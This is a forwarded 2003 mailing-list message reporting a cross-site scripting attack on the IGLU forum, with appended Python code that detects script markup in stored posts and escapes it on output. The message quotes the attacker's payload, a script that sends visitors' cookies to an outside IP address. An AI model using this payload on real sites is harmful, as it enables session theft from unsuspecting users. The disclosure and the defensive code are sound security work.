cross-site scripting attack on iglu, discovered by Aviram.

----- Forwarded message from Aviram Jenik <[EMAIL PROTECTED]> -----

Date: Tue, 1 Jul 2003 07:14:41 +0300
From: Aviram Jenik <[EMAIL PROTECTED]>
User-Agent: KMail/1.5.2
To: Muli Ben-Yehuda <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: 2600.org

On Tuesday 01 July 2003 00:19, Muli Ben-Yehuda wrote:
> WTF^2
> http://www.iglu.org.il:8080/Control_Panel/Products/Squishdot/IGLU/105562112
>0/index_html

Look at what this user posted:
<script>alert("bla")</script>

and then (when he saw that works)
<script>location = "http://81.218.219.239/cookietrap.php?cookie="+escape(document.cookie)</script>

Stealing the cookie of everyone who visits this page!

Don't you filter <script> tags on iglu? What program are you using for the forums?

--
- Aviram

----- End forwarded message -----

--
Muli Ben-Yehuda
http://www.mulix.org
http://www.livejournal.com/~mulix/
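An added example, not part of the original message and not Squishdot's own code: a Python check that audits stored post bodies for markup that would execute if sent to the browser unescaped, next to an output-escaping renderer that displays the same bodies as inert text. The names ActiveContentFinder, audit_post and render_post are hypothetical; the sample posts are constructed, with the two script bodies taken from the message above.

```python
import html
from html.parser import HTMLParser

# Constructed sample posts. Bodies 2 and 3 are the two posts quoted in the
# message above; body 1 is an invented harmless post.
POSTS = [
    "Meeting moved to Thursday, see <the wiki> & bring laptops",
    '<script>alert("bla")</script>',
    '<script>location = "http://81.218.219.239/cookietrap.php?cookie="'
    "+escape(document.cookie)</script>",
]

SCRIPT_TAGS = {"script", "iframe", "object", "embed"}


class ActiveContentFinder(HTMLParser):
    """Hypothetical helper: records markup that would execute if sent raw."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in SCRIPT_TAGS:
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            url = (value or "").strip().lower()
            if name.startswith("on"):  # inline event handlers
                self.findings.append(f"{tag}@{name}")
            elif name in ("href", "src") and url.startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")


def audit_post(body):
    """Return the active-content findings for one stored post body."""
    finder = ActiveContentFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def render_post(body):
    """Escape the body on output so the browser shows it as text."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


if __name__ == "__main__":
    for post in POSTS:
        print(audit_post(post), "->", render_post(post))
```

Escaping at render time is the actual fix; the audit pass is for finding posts that were already stored before the fix went in.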
